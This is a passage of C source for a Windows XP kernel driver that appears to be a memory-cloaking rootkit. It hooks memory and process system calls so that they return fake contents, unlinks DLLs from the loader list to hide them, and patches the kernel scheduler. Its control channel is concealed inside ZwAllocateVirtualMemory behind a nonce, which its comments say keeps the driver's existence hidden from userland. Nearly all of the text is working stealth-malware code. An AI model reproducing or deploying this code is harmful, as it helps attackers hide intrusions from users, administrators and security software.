            MarkPageValid(cur_page & 0xFFFFF000);
        }
        
        // 2. Change of Trust
        __asm {
            cli
            mov eax, cr3
            mov cr3, eax
            sti
        }

        KeUnstackDetachProcess(&savedAPC);

        id.UniqueProcess = (HANDLE)pid;
        id.UniqueThread = 0;

        InitializeObjectAttributes(&attrib, NULL, OBJ_INHERIT, NULL, 
                NULL);

        // Technically only need VM_OPERATION and VM_WRITE, but fuck it
        stat = ZwOpenProcess(&proc, PROCESS_ALL_ACCESS, &attrib, &id);

        if(!NT_SUCCESS(stat)) {
            LR_NOTE(("NOT: OpenProcess: %x\n", stat));
            goto out_remote;
        }
        
        pebptr = BorrowBytesFromTeb(&tmp, sizeof(tmp)); // Need userland addr

        stat = sa.ZwWriteVirtualMemory(proc, (PVOID)dest, (PVOID)src, len, pebptr);

        if(!NT_SUCCESS(stat)) {
            LR_WARN(("WRN: WriteHVirtualMemory: %x %d/%d\n", stat, *pebptr, len));
            ZwClose(proc);
            goto out_remote;
        }
        
        ReturnBytesToTeb(pebptr, &tmp, sizeof(tmp));

        ZwClose(proc);

        KeStackAttachProcess(peproc, &savedAPC);

out_remote:

        for(cur_page = dest; cur_page < (dest+len); cur_page += PAGE_SIZE) {
            MarkPageInvalid(cur_page & 0xFFFFF000);
        }

        // Change of Trust
        __asm {
            cli
            mov eax, cr3
            mov cr3, eax
            sti
        }
        
        if(NT_SUCCESS(stat)) {
            KeUnstackDetachProcess(&savedAPC);
        }

    } else {
        for(cur_page = dest; cur_page < (dest+len); cur_page += PAGE_SIZE) {
            MarkPageValid(cur_page & 0xFFFFF000);
        }

        // Change of Trust
        __asm {
            cli
            mov eax, cr3
            mov cr3, eax
            sti
        }

        if((stat = ProbeForWriteStatus((PVOID)dest, len, 1))) {
            LR_NOTE(("NOT: Cannot Write dest memory: %x %x\n", dest, stat));
            goto out_local;
        }

        if((stat = ProbeForReadStatus((PVOID)src, len, 1))) {
            LR_NOTE(("NOT: Cannot read src memory: %x %x\n", src, stat));
            goto out_local;
        }

        memmove((PVOID)dest, (PVOID)src, len);

out_local:
        for(cur_page = dest; cur_page < (dest+len); cur_page += PAGE_SIZE) {
            MarkPageInvalid(cur_page & 0xFFFFF000);
        }

        // Change of Trust
        __asm {
            cli
            mov eax, cr3
            mov cr3, eax
            sti
        }
    }

    return stat;
}

NTSTATUS ReadHidden(DWORD pid, DWORD read, DWORD out, DWORD len)
{
    DWORD cur_page;
    DWORD tmp;
    DWORD *pebptr;
    NTSTATUS stat = 0;
    int i;
    
    for(i = 0; i < num_hooks; i++) {
        // Meh, don't really need to check the whole range..
        if(hooks[i].CloakedVirtualAddress == (read & 0xfffff000)) {
            break;
        }
    }
    if(i == num_hooks) {
        LR_NOTE(("NOT: Read address %x is not hidden\n", read));
        return STATUS_ADDRESS_NOT_ASSOCIATED;
    }

    if(pid != (DWORD)PsGetCurrentProcessId()) {
        DWORD written;
        HANDLE proc;
        PEPROCESS peproc;
        KAPC_STATE savedAPC;
        CLIENT_ID id;
        OBJECT_ATTRIBUTES attrib;

        stat = PsLookupProcessByProcessId(pid, &peproc);
        if(!NT_SUCCESS(stat) || !peproc) {
            LR_NOTE(("NOT: Failed to find pid %d: %x\n", pid, stat));
            return stat;
        }

        KeStackAttachProcess(peproc, &savedAPC);
        __asm {
            cli
            mov eax, cr3
            mov cr3, eax
            sti
        }

        // Loop:
        //   1. Mark all pages valid

        for(cur_page = read; cur_page < (read+len); cur_page += PAGE_SIZE) {
            MarkPageValid(cur_page & 0xFFFFF000);
        }
        
        // 2. Change of Trust
        __asm {
            cli
            mov eax, cr3
            mov cr3, eax
            sti
        }

        KeUnstackDetachProcess(&savedAPC);

        id.UniqueProcess = (HANDLE)pid;
        id.UniqueThread = 0;

        InitializeObjectAttributes(&attrib, NULL, OBJ_INHERIT, NULL, 
                NULL);

        // Technically only need VM_OPERATION and VM_WRITE, but fuck it
        stat = ZwOpenProcess(&proc, PROCESS_ALL_ACCESS, &attrib, &id);

        if(!NT_SUCCESS(stat)) {
            LR_NOTE(("NOT: OpenProcess: %x\n", stat));
            goto out_remote;
        }
        
        pebptr = BorrowBytesFromTeb(&tmp, sizeof(tmp)); // Need userland addr

        stat = sa.ZwReadVirtualMemory(proc, (PVOID)read, (PVOID)out, len, pebptr);

        if(!NT_SUCCESS(stat)) {
            LR_WARN(("WRN: ReadHVirtualMemory: %x %d/%d\n", stat, *pebptr, len));
            ZwClose(proc);
            goto out_remote;
        }
        
        ReturnBytesToTeb(pebptr, &tmp, sizeof(tmp));

        ZwClose(proc);

        KeStackAttachProcess(peproc, &savedAPC);

out_remote:
        for(cur_page = read; cur_page < (read+len); cur_page += PAGE_SIZE) {
            MarkPageInvalid(cur_page & 0xFFFFF000);
        }

        // Change of Trust
        __asm {
            cli
            mov eax, cr3
            mov cr3, eax
            sti
        }
        if(NT_SUCCESS(stat)) { 
            KeUnstackDetachProcess(&savedAPC);
        }

    } else {
        for(cur_page = read; cur_page < (read+len); cur_page += PAGE_SIZE) {
            MarkPageValid(cur_page & 0xFFFFF000);
        }

        // Change of Trust
        __asm {
            cli
            mov eax, cr3
            mov cr3, eax
            sti
        }

        if((stat = ProbeForWriteStatus((PVOID)out, len, 1))) {
            LR_NOTE(("NOT: Cannot Write dest memory: %x %x\n", out, stat));
            goto out_local;
        }

        if((stat = ProbeForReadStatus((PVOID)read, len, 1))) {
            LR_NOTE(("NOT: Cannot read src memory: %x %x\n", read, stat));
            goto out_local;
        }

        memmove((PVOID)out, (PVOID)read, len);

out_local:

        for(cur_page = read; cur_page < (read+len); cur_page += PAGE_SIZE) {
            MarkPageInvalid(cur_page & 0xFFFFF000);
        }

        // Change of Trust
        __asm {
            cli
            mov eax, cr3
            mov cr3, eax
            sti
        }
    }

    return stat;
}

// XXX: Extremely WinXP SP2 specific... Needs offset table...
NTSTATUS HideDllByHandle(DWORD pid, DWORD dllhandle, DWORD fake, DWORD fake_end)
{
    PEPROCESS peproc;
    KAPC_STATE savedAPC;
    MPEB *peb;
    PLDR_DATA_TABLE_ENTRY dll;
    NTSTATUS stat;
    DWORD dll_start = 0;
    DWORD dll_end = 0;
    BOOL in_process = (pid == (DWORD)PsGetCurrentProcessId());
    int cnt = 0;
    int i;

    if(!in_process) {
        stat = PsLookupProcessByProcessId((DWORD)pid, &peproc);
        if(!NT_SUCCESS(stat) || !peproc) {
            LR_NOTE(("NOT: Failed to find pid %d: %x\n", pid, stat));
            return stat;
        }
        KeStackAttachProcess(peproc, &savedAPC);
    }

    peb = GetCurrentPeb();
    if(!peb->Ldr || !peb->Ldr->Initialized) {
        LR_NOTE(("NOT: Loader is not initilized yet\n"));
        if(!in_process) KeUnstackDetachProcess(&savedAPC);
        return STATUS_INVALID_IMAGE_FORMAT;
    }

    LR_DEBUG(("DBG: Length is: %d\n", peb->Ldr->Length));

    // FIXME: not SMP safe.. need to find real lock ptr..
    BigKernelLock(); 
    dll = RemoveHandleFromModuleList(&peb->Ldr->InLoadOrderModuleList,
            (HANDLE)dllhandle);
    if(dll) peb->Ldr->Length--;
    BigKernelUnLock();

    if(!dll) {
        LR_NOTE(("NOT: Error Dll not found\n"));
        if(!in_process) KeUnstackDetachProcess(&savedAPC);
        return STATUS_DLL_NOT_FOUND;
    }

    dll_start = (DWORD)dll->DllBase;
    dll_end = dll_start + dll->SizeOfImage;

    if(fake && fake_end) {
        if((fake_end - fake) < dll->SizeOfImage) {
            LR_NOTE(("NOT: Insufficient cloak size. Use GetModuleInformation()\n"));
            if(!in_process) KeUnstackDetachProcess(&savedAPC);
            return STATUS_INVALID_PARAMETER;
        }
        fake_end = fake+dll->SizeOfImage;
    } else {
        fake_end = 0;
    }

    if(!in_process) KeUnstackDetachProcess(&savedAPC);

    if((stat = AddCloak(pid, dll_start, dll_end, fake, fake_end))) {
        return stat;
    }

    if((stat = AddCode(pid, dll_start, dll_end, dll_start, dll_end))) { 
        return stat;
    }
    LR_DEBUG(("Dll remove successful\n"));
    return 0;
}

// XXX: Extremely WinXP SP2 specific... Needs offset table...
NTSTATUS HideDllByName(DWORD pid, const wchar_t *name, DWORD fake, 
        DWORD fake_end)
{
    PEPROCESS peproc;
    KAPC_STATE savedAPC;
    MPEB *peb;
    PLDR_DATA_TABLE_ENTRY dll;
    NTSTATUS stat;
    DWORD dll_start = 0;
    DWORD dll_end = 0;
    BOOL in_process = (pid == (DWORD)PsGetCurrentProcessId());
    int cnt = 0;
    int i;

    if(!in_process) {
        stat = PsLookupProcessByProcessId((DWORD)pid, &peproc);
        if(!NT_SUCCESS(stat) || !peproc) {
            LR_NOTE(("NOT: Failed to find pid %d: %x\n", pid, stat));
            return stat;
        }
        KeStackAttachProcess(peproc, &savedAPC);
    }

    peb = GetCurrentPeb();
    if(!peb->Ldr || !peb->Ldr->Initialized) {
        LR_NOTE(("NOT: Loader is not initilized yet\n"));
        if(!in_process) KeUnstackDetachProcess(&savedAPC);
        return STATUS_INVALID_IMAGE_FORMAT;
    }

    LR_DEBUG(("DBG: Length is: %d\n", peb->Ldr->Length));

    // FIXME: not SMP safe.. need to find real lock ptr..
    BigKernelLock(); 
    dll = RemoveNameFromModuleList(&peb->Ldr->InLoadOrderModuleList,
            name);
    if(dll) peb->Ldr->Length--;
    BigKernelUnLock();

    if(!dll) {
        LR_NOTE(("NOT: Error Dll not found\n"));
        if(!in_process) KeUnstackDetachProcess(&savedAPC);
        return STATUS_DLL_NOT_FOUND;
    }

    if(fake && fake_end) {
        if((fake_end - fake) < dll->SizeOfImage) {
            LR_NOTE(("NOT: Insufficient cloak size. Use GetModuleInformation()\n"));
            if(!in_process) KeUnstackDetachProcess(&savedAPC);
            return STATUS_INVALID_PARAMETER;
        }
        fake_end = fake+dll->SizeOfImage;
    } else {
        fake_end = 0;
    }

    dll_start = (DWORD)dll->DllBase;
    dll_end = dll_start + dll->SizeOfImage;

    if(!in_process) KeUnstackDetachProcess(&savedAPC);

    if((stat = AddCloak(pid, dll_start, dll_end, fake, fake_end))) {
        return stat;
    }

    if((stat = AddCode(pid, dll_start, dll_end, dll_start, dll_end))) { 
        return stat;
    }

    LR_DEBUG(("Dll remove successful\n"));
    return 0;
}


NTSTATUS NTAPI NewZwFreeVirtualMemory(HANDLE ProcessHandle,
        PVOID *BaseAddress,PULONG FreeSize,ULONG FreeType)
{
    DWORD tPID = GetProcessIDForHandle(ProcessHandle);
    int i = 0;

    for(i = 0; i < num_pids; i++) 
        if(pids[i] == tPID) 
            break;

    if(i == num_pids) 
        return sa.ZwFreeVirtualMemory(ProcessHandle, BaseAddress, FreeSize,
                FreeType);
    

    if(ProbeForReadStatus(BaseAddress, sizeof(PVOID), 1) == 0
            && ProbeForReadStatus(FreeSize, sizeof(ULONG), 1)) {
        RemoveCloak(tPID, (DWORD)*BaseAddress, ((DWORD)*BaseAddress)+*FreeSize);
    }

    return IntFreeVirtualMemory(tPID, ProcessHandle, BaseAddress, FreeSize, FreeType);
}


NTSTATUS NTAPI NewZwQueryVirtualMemory (IN HANDLE ProcessHandle, 
		IN PVOID Address, 
		IN MEMORY_INFORMATION_CLASS class, 
		OUT PVOID oinfo, IN ULONG Length, 
		OUT PULONG ResultLength)
{
    HANDLE tmp = (ProcessHandle ? ProcessHandle : (HANDLE)-1);
    ULONG pid = GetProcessIDForHandle(tmp);
    NTSTATUS stat;
    int i;

    if(class != MemoryBasicInformation) {
        return sa.ZwQueryVirtualMemory(ProcessHandle, 
                Address, class, oinfo, Length, ResultLength);
    }
    
    // Hide cloaks that map to 0
    for(i = 0; i < num_fakes; i++) {
        if(fakes[i].pid == pid && fakes[i].CloakedVirtualAddr <= (DWORD)Address 
                && (DWORD)Address < fakes[i].CloakedVirtualAddr + fakes[i].FakeSize) {
            PMEMORY_BASIC_INFORMATION pbi = (PMEMORY_BASIC_INFORMATION)oinfo;

            if((stat = ProbeForWriteStatus(oinfo, Length, 1))) {
                LR_NOTE(("NOT: Memory probe failed: %x %x\n", oinfo, stat));
                return stat;
            }

            pbi->BaseAddress = pbi->AllocationBase 
                = (PVOID)fakes[i].CloakedVirtualAddr;
            pbi->AllocationProtect = 0;
            pbi->RegionSize = fakes[i].FakeSize;
            pbi->State = MEM_RESERVE;
            pbi->Protect = 0;
            pbi->Type = 0x1000000;//MEM_IMAGE; // Hrm.. or private?

            if(!ProbeForWriteStatus(ResultLength, sizeof(ULONG), 1)) {
                *ResultLength = sizeof(*pbi);
            }
            return 0;
        }
    }

    // TODO: While it may be tempting to hide the fake backing pages as well,
    // this is not desirable, because it is much easier to install an 
    // exception handler and manually test if VirtualQuery lies
    // about present/not-present memory than it is to see if 
    // two pages contain the same data. We can get away with hiding cloaks
    // because we actually generate an exception when they are touched.
    // This is harder to do with fake backing pages because we need 
    // an additional search and check in the page fault handler.
    // Doable, but probably not worth the perf hit. Or maybe it is..

    return sa.ZwQueryVirtualMemory(ProcessHandle, 
            Address, class, oinfo, Length, ResultLength);
}


NTSTATUS NTAPI NewZwTerminateProcess(IN HANDLE ProcessHandle OPTIONAL, 
        IN NTSTATUS ExitStatus)
{
    int i;
    HANDLE tmp = (ProcessHandle ? ProcessHandle : (HANDLE)-1);
    ULONG pid = GetProcessIDForHandle(tmp);
    ULONG cur_cr3;

    // XXX: Process termination creates a minor race on these
    // data structures with the query ops.. Need a lock
    for(i = 0; i < MAX_PIDS-1; i++) {
        if(pids[i] == pid) {
            LR_DEBUG(("DBG: Removing pid: %d\n", pid));
            memmove(&pids[i], &pids[i+1], 
                    sizeof(pids) - (i+1)*sizeof(pids[0]));
            num_pids--;
            i--;
        }
    }

    RemoveCloak(pid, 0, 0xfffe0000); 
    return sa.ZwTerminateProcess(ProcessHandle, ExitStatus);
}



NTSTATUS NTAPI NewZwWriteVirtualMemory(HANDLE ProcessHandle,
		PVOID BaseAddress,PVOID Buffer,ULONG BufferLength,PULONG ReturnLength)
{
   DWORD tPID = GetProcessIDForHandle(ProcessHandle);
   NTSTATUS stat = 0;
   int i;

   for (i=0; i < num_pids; i++) { 
       if (pids[i] == tPID) 
           break;
   }

   if (i == num_pids || !BufferLength) {
       return sa.ZwWriteVirtualMemory(ProcessHandle,
               BaseAddress, Buffer, BufferLength, ReturnLength);
   }

   if (tPID != (DWORD)PsGetCurrentProcessId()) {
       PEPROCESS peproc;
       KAPC_STATE savedAPC;
       PVOID kbuf;
       LR_DEBUG(("DBG: Out of process Write(%x, %x, %x, %x, %x)\n",
                   ProcessHandle, BaseAddress, Buffer, BufferLength,
                   ReturnLength));
       kbuf = ExAllocatePoolWithTag(PagedPool, BufferLength, 'nroT');

       if(!kbuf) {
           LR_WARN(("WRN: No memory for pool allocation\n"));
           return STATUS_NO_MEMORY;
       }

       stat = PsLookupProcessByProcessId(tPID, &peproc);

       if(!NT_SUCCESS(stat) || !peproc) {
           LR_NOTE(("NOT: Failed to find pid %d: %x\n", tPID, stat));
           goto free;
       }

       stat = ProbeForReadStatus(Buffer, BufferLength, 1);
       if(!NT_SUCCESS(stat)) {
           LR_NOTE(("NOT: WVM Cannot read %x\n", Buffer));
           goto free;
       }

       RtlCopyMemory(kbuf, Buffer, BufferLength);

       KeStackAttachProcess(peproc, &savedAPC);

       stat = ProbeForWriteStatus(BaseAddress, BufferLength, 1);
       if(!NT_SUCCESS(stat)) {
           LR_NOTE(("NOT: WVM Cannot write %x\n", BaseAddress));
           goto unstack;
       }
       RtlCopyMemory(BaseAddress, kbuf, BufferLength);

       if(!ProbeForWriteStatus(ReturnLength, sizeof(ULONG), 1)) {
           *ReturnLength = BufferLength;
       }

unstack:
       KeUnstackDetachProcess(&savedAPC);

free:
       ExFreePoolWithTag(kbuf, 'nroT');
       return stat;

   } else {

       stat = ProbeForReadStatus(Buffer, BufferLength, 1);
       if(!NT_SUCCESS(stat)) {
           LR_NOTE(("NOT: WVM Cannot read %x\n", Buffer));
           return stat;
       }
       stat = ProbeForWriteStatus(BaseAddress, BufferLength, 1);
       if(!NT_SUCCESS(stat)) {
           LR_NOTE(("NOT: WVM Cannot write %x\n", BaseAddress));
           return stat;
       }
       // XXX: Memmove? Can they overlap?
       RtlCopyMemory(BaseAddress, Buffer, BufferLength);

       if(!ProbeForWriteStatus(ReturnLength, sizeof(ULONG), 1)) {
           *ReturnLength = BufferLength;
       }

       return 0;
   }

   return 0;
}


// Hook ZwReadVirtualMemory to give out fakes
//      - Do it right.. KeAttachProcess.. ProbeForWrite
NTSTATUS NTAPI NewZwReadVirtualMemory(IN HANDLE ProcessHandle, 
		IN PVOID BaseAddress, OUT PVOID Buffer, IN ULONG NumberOfBytesToRead, 
		OUT PULONG NumberOfBytesRead OPTIONAL)
{
    DWORD tPID = GetProcessIDForHandle(ProcessHandle);
    DWORD readEnd = (DWORD)BaseAddress + NumberOfBytesToRead;
    NTSTATUS stat = 0;
    int i;

    for (i=0; i < num_pids; i++) { 
        if (pids[i] == tPID) 
            break;
    }

    if (i == num_pids || !NumberOfBytesToRead) {
        return sa.ZwReadVirtualMemory(ProcessHandle,
                BaseAddress, Buffer, NumberOfBytesToRead, NumberOfBytesRead);
    }

    if (tPID != (DWORD)PsGetCurrentProcessId()) {
        PEPROCESS peproc;
        KAPC_STATE savedAPC;
        PVOID kbuf;
        LR_DEBUG(("DBG: Out of process Read(%x, %x, %x, %x, %x)\n",
                    ProcessHandle, BaseAddress, Buffer, NumberOfBytesToRead,
                    NumberOfBytesRead));

        kbuf = ExAllocatePoolWithTag(PagedPool, NumberOfBytesToRead, 
                'nroT');

        if(!kbuf) {
            LR_WARN(("WRN: No memory for pool allocation\n"));
            return STATUS_NO_MEMORY;
        }

        stat = PsLookupProcessByProcessId(tPID, &peproc);

        if(!NT_SUCCESS(stat) || !peproc) {
            LR_NOTE(("NOT: Failed to find pid %d: %x\n", tPID, stat));
            goto free;
        }

        KeStackAttachProcess(peproc, &savedAPC);

        stat = ProbeForReadStatus(BaseAddress, NumberOfBytesToRead, 1);
        if(!NT_SUCCESS(stat)) {
            LR_NOTE(("NOT: RVMO cannot read %x %x\n", BaseAddress, stat));
            KeUnstackDetachProcess(&savedAPC);
            goto free;
        }
        RtlCopyMemory(kbuf, BaseAddress, NumberOfBytesToRead);

        KeUnstackDetachProcess(&savedAPC);

        stat = ProbeForWriteStatus(Buffer, NumberOfBytesToRead, 1);
        if(!NT_SUCCESS(stat)) {
            LR_NOTE(("NOT: RVMO cannot write %x %x\n", Buffer, stat));
            goto free;
        }
        RtlCopyMemory(Buffer, kbuf, NumberOfBytesToRead);

        if(!ProbeForWriteStatus(NumberOfBytesRead, sizeof(ULONG), 1)) {
            *NumberOfBytesRead = NumberOfBytesToRead;
        }

free:
        ExFreePoolWithTag(kbuf, 'nroT');
        return stat;

    } else {

        stat = ProbeForWriteStatus(Buffer, NumberOfBytesToRead, 1); 
        if(!NT_SUCCESS(stat)) {
            LR_NOTE(("NOT: RVM cannot write %x %x\n", Buffer, stat));
            return stat;
        }
        stat = ProbeForReadStatus(BaseAddress, NumberOfBytesToRead,1);
        if(!NT_SUCCESS(stat)) {
            LR_NOTE(("NOT: RVM cannot read %x %x\n", BaseAddress, stat));
            return stat;
        }

        RtlCopyMemory(Buffer, BaseAddress, NumberOfBytesToRead);

        if(!ProbeForWriteStatus(NumberOfBytesRead, sizeof(ULONG), 1)) {
            *NumberOfBytesRead = NumberOfBytesToRead;
        }
        return 0;
    }

    return 0;
}

unsigned char PatchBuf[256];
DWORD PatchJmp = (DWORD)&PatchBuf[0];
DWORD SwapContextAddr = 0;
void __declspec(naked) SchedulerPatch()
{
    __asm {
        push eax
        cli
        mov eax, cr3
        mov cr3, eax
        sti
        pop eax
        jmp PatchJmp
    }
}

NTSTATUS PatchScheduler(DWORD IDASwapContextAddr)
{
    ULONG ModuleLen = 0;
    NTSTATUS stat = 0;
    ULONG i;
    PSYSTEM_MODULE_INFORMATION pinfo;
    DWORD NTBaseAddr = 0;

    if(!IDASwapContextAddr) {
        LR_NOTE(("NOT: Blind guessing that this is WinXP SP2 and that SwapContext is at: %x\n", WINXP_SP2_SWAPCONTEXT));
        IDASwapContextAddr = WINXP_SP2_SWAPCONTEXT;
    }

    // The PE header for ntoskrnl.exe says its base is the standard 0x400000
    IDASwapContextAddr -= 0x400000; 

    stat = NtQuerySystemInformation(SystemModuleInformation, 
            &i, sizeof(i), &ModuleLen);

    if(stat != STATUS_INFO_LENGTH_MISMATCH) {
        LR_NOTE(("NOT: Cant get module length for patch: %d %x\n", ModuleLen, stat));
        return stat;
    }

    pinfo = ExAllocatePoolWithTag(PagedPool, ModuleLen, 'ADHD');

    stat = NtQuerySystemInformation(SystemModuleInformation, 
            pinfo, ModuleLen, &i);
    
    if(!NT_SUCCESS(stat)) {
        LR_NOTE(("NOT: Module query failed: %x\n", stat));
        return stat;
    }

    for(i = 0; i < pinfo->Count; i++) {
        LR_DEBUG(("DBG: Found module %s at %x\n", pinfo->Module[i].ImageName,
                    pinfo->Module[i].Base));
        if(strstr(pinfo->Module[i].ImageName, "ntoskrnl.exe") != 0) {
            NTBaseAddr = (DWORD)pinfo->Module[i].Base;
            break;
        }
    }

    if(!NTBaseAddr) {
        LR_NOTE(("NOT: Cannot find ntoskrml!\n"));
        return STATUS_NOT_FOUND;
    }

    stat = SetupHotPatch(IDASwapContextAddr + NTBaseAddr, 
            (DWORD)SchedulerPatch, (DWORD)PatchBuf, sizeof(PatchBuf));

    if(!NT_SUCCESS(stat)) {
        LR_NOTE(("NOT: Failed to patch scheduler: %x\n", stat));
        return stat;
    } else {
        LR_DEBUG(("DBG: Scheduler patch succeded\n"));
    }

    SwapContextAddr = IDASwapContextAddr + NTBaseAddr;
    ExFreePoolWithTag(pinfo, 'ADHD');
    return 0;
}

// Ugliest hack ever, but Win2k3 won't let you add syscall tables anymore, 
// and the Ioctl API fucking BLOWS. Also leaving a listable device file 
// around for the ioctl can tip off our existence from userland. 
// The nonce makes this api a bit harder to find 
// (if you remember to change it ; )
NTSTATUS NTAPI NewZwAllocateVirtualMemory(HANDLE ProcessHandle,
        PVOID *BaseAddress,ULONG ZeroBits,PULONG AllocationSize,
        ULONG AllocationType,ULONG Protect)
{
    NTSTATUS stat = STATUS_INVALID_PARAMETER;

    if(ProcessHandle != HANDLE_NONCE) {
        return sa.ZwAllocateVirtualMemory(ProcessHandle, BaseAddress, 
                ZeroBits, AllocationSize, AllocationType, Protect);
    }

    switch(Protect)
    {
        case CMD_ADD_CLOAK:
        case CMD_ADD_ALLOWED:
        case CMD_REMOVE_CLOAK:
        case CMD_REMOVE_ALLOWED:
        case CMD_WRITE_HIDDEN:
        case CMD_READ_HIDDEN:
        case CMD_HIDE_DLL_BY_NAME:
        case CMD_HIDE_DLL_BY_HANDLE:
        case CMD_CHANGE_TRUST:
        case CMD_PATCH_SCHEDULER:
            if((stat = ProbeForReadStatus(BaseAddress, sizeof(ULONG), 1))) {
                LR_NOTE(("NOT: OS passed us funky BaseAddr Ptr:%x %x\n", BaseAddress, 
                            stat));
                return stat;
            }
            break;
    }
 
    switch(Protect)
    {
        case CMD_ADD_CLOAK:
            LR_DEBUG(("DBG: Got Cloak Cmd\n"));
            if(!(stat = ProbeForReadStatus(*BaseAddress, sizeof(CMD_CLOAK_ARGS), 1))) {
                CMD_CLOAK_ARGS *args = (CMD_CLOAK_ARGS*)*BaseAddress;
                stat = AddCloak(args->pid, args->cloak_start,
                        args->cloak_end, args->fake_start, 
                        args->fake_end);
                if(NT_SUCCESS(stat)) {
                    int i;
                    for(i = 0; i < num_pids; i++) {
                        if(pids[i] == args->pid)
                            break;
                    }
                    if (i == num_pids && num_pids < MAX_PIDS) {
                        LR_DEBUG(("DBG: Adding pid: %d\n", args->pid));
                        pids[num_pids++] = args->pid;
                    } else if (num_pids == MAX_PIDS) {
                        LR_WARN(("WRN: No memory for pid %d\n", args->pid));
                    }
                }
            } else {
                LR_NOTE(("NOT: Bad addr for add cloak args: %x %x\n", *BaseAddress, stat));
            }

            return stat;

        case CMD_ADD_ALLOWED:
            LR_DEBUG(("DBG: Got Code Cmd\n"));
            if(!(stat = ProbeForReadStatus(*BaseAddress, sizeof(CMD_ALLOWED_ARGS), 1))) {
                CMD_ALLOWED_ARGS *args = (CMD_ALLOWED_ARGS*)*BaseAddress;
                stat = AddCode(args->pid, args->code_start,
                        args->code_end, args->cloak_start, 
                        args->cloak_end);
            } else {
                LR_NOTE(("NOT: Bad Addr for add code args: %x %x\n", *BaseAddress, stat));
            }
 
            return stat;

        case CMD_REMOVE_CLOAK:
            LR_DEBUG(("DBG: Got Remove Redirect Cmd\n"));
            if(!(stat = ProbeForReadStatus(*BaseAddress, sizeof(CMD_REMOVE_ARGS), 1))) {
                CMD_REMOVE_ARGS *args = (CMD_REMOVE_ARGS*)*BaseAddress;
                stat = RemoveCloak(args->pid, args->start, args->end);
            } else {
                LR_NOTE(("NOT: Bad addr for remove cloak args: %x %x\n", *BaseAddress, stat));
            }


            return stat;

        case CMD_REMOVE_ALLOWED:
            LR_DEBUG(("DBG: Got Remove Code Cmd\n"));
            if(!(stat = ProbeForReadStatus(*BaseAddress, sizeof(CMD_REMOVE_ARGS), 1))) {
                CMD_REMOVE_ARGS *args = (CMD_REMOVE_ARGS*)*BaseAddress;
                stat = RemoveCode(args->pid, args->start, args->end);
            } else {
                LR_NOTE(("NOT: Bad addr for remove code args: %x %x\n", *BaseAddress, stat));
            }

 
            return stat;

        case CMD_WRITE_HIDDEN:
            LR_DEBUG(("DBG: Got Write Code\n"));
            if(!(stat = ProbeForReadStatus(*BaseAddress, sizeof(CMD_RW_ARGS), 1))) {
                CMD_RW_ARGS *args = (CMD_RW_ARGS*)*BaseAddress;
                stat = WriteHidden(args->pid, args->dest, args->source, 
                        args->len);
            } else {
                LR_NOTE(("NOT: Bad addr for write args: %x %x\n", *BaseAddress, stat));
            }
            return stat;
            
        case CMD_READ_HIDDEN:
            LR_DEBUG(("DBG: Got Read Code\n"));
            if(!(stat = ProbeForReadStatus(*BaseAddress, sizeof(CMD_RW_ARGS), 1))) {
                CMD_RW_ARGS *args = (CMD_RW_ARGS*)*BaseAddress;
                stat = ReadHidden(args->pid, args->dest, args->source, 
                        args->len);
            } else {
                LR_NOTE(("NOT: Bad addr for read args: %x %x\n", *BaseAddress, stat));
            }

            return stat;

        case CMD_HIDE_DLL_BY_HANDLE:
            LR_DEBUG(("DBG: Hide DLL By Handle\n"));
            if(!(stat = ProbeForReadStatus(*BaseAddress, sizeof(CMD_HIDE_DLL_ARGS), 1))) {
                CMD_HIDE_DLL_ARGS args = *(CMD_HIDE_DLL_ARGS*)*BaseAddress;
                 stat = HideDllByHandle(args.pid, args.dll_handle, 
                        args.fake_start, 
                        args.fake_end);
            } else {
                LR_NOTE(("NOT: Bad addr for hide dll args: %x %x\n", *BaseAddress, stat));
            }

            return stat;
            
        case CMD_HIDE_DLL_BY_NAME:
            LR_DEBUG(("DBG: Hide DLL By Name\n"));
            if(!(stat = ProbeForReadStatus(*BaseAddress, sizeof(CMD_HIDE_DLL_ARGS), 1))) {
                CMD_HIDE_DLL_ARGS args = *(CMD_HIDE_DLL_ARGS*)*BaseAddress;
                if(args.pid != (DWORD)PsGetCurrentProcessId()) {
                    size_t len = wcslen(args.dll_name);
                    wchar_t *name = ExAllocatePoolWithTag(PagedPool, 
                            (len+1)*sizeof(wchar_t), 'nroT');

                    if(!name) { 
                        LR_WARN(("WRN: Out of memory for dll name copy\n"));
                        return STATUS_NO_MEMORY;
                    }
                    memcpy(name, args.dll_name, (len+1)*sizeof(wchar_t));
                    args.dll_name = name;
                }
                stat = HideDllByName(args.pid, args.dll_name, args.fake_start, 
                        args.fake_end);

                if(args.pid != (DWORD)PsGetCurrentProcessId()) {
                    ExFreePoolWithTag((void*)args.dll_name, 'nroT');
                }
            } else {
                LR_NOTE(("NOT: Bad addr for hide dll args: %x %x\n", *BaseAddress, stat));
            }

            return stat;
            
            
        case CMD_CHANGE_TRUST:
            LR_DEBUG(("DBG: Initiating Trust Change\n"));

            if(!(stat = ProbeForReadStatus(*BaseAddress, sizeof(CMD_CHANGE_TRUST_ARGS), 1))) {
                CMD_CHANGE_TRUST_ARGS args = 
                    *(CMD_CHANGE_TRUST_ARGS *)*BaseAddress;
                if(args.pid != (DWORD)PsGetCurrentProcessId()) {
                    PEPROCESS peproc;
                    KAPC_STATE savedAPC;
                    stat = PsLookupProcessByProcessId((DWORD)args.pid, &peproc);
                    if(!NT_SUCCESS(stat) || !peproc) {
                        LR_NOTE(("NOT: Failed to find pid %d: %x\n", args.pid, 
                                    stat));
                        return stat;
                    }
                    KeStackAttachProcess(peproc, &savedAPC);
                    __asm {
                        cli
                            mov eax, cr3
                            mov cr3, eax
                            sti
                    }
                    KeUnstackDetachProcess(&savedAPC);
                } else {
                    __asm {
                        cli
                            mov eax, cr3
                            mov cr3, eax
                            sti
                    }

                }
            } else {
                LR_NOTE(("NOT: Bad addr for trust args: %x %x\n", *BaseAddress, stat));
            }

            return 0;
        
        case CMD_PATCH_SCHEDULER:
            LR_DEBUG(("DBG: Patching scheduler...\n"));
            if(!(stat = ProbeForReadStatus(*BaseAddress, sizeof(CMD_PATCH_SCHEDULER_ARGS), 1))) {
                CMD_PATCH_SCHEDULER_ARGS args = *(CMD_PATCH_SCHEDULER_ARGS*)*BaseAddress;
                return PatchScheduler(args.SwapContextIDA);
            }
            return stat;

        default:
            return sa.ZwAllocateVirtualMemory(ProcessHandle, BaseAddress, ZeroBits, AllocationSize, AllocationType, Protect);
    }
}

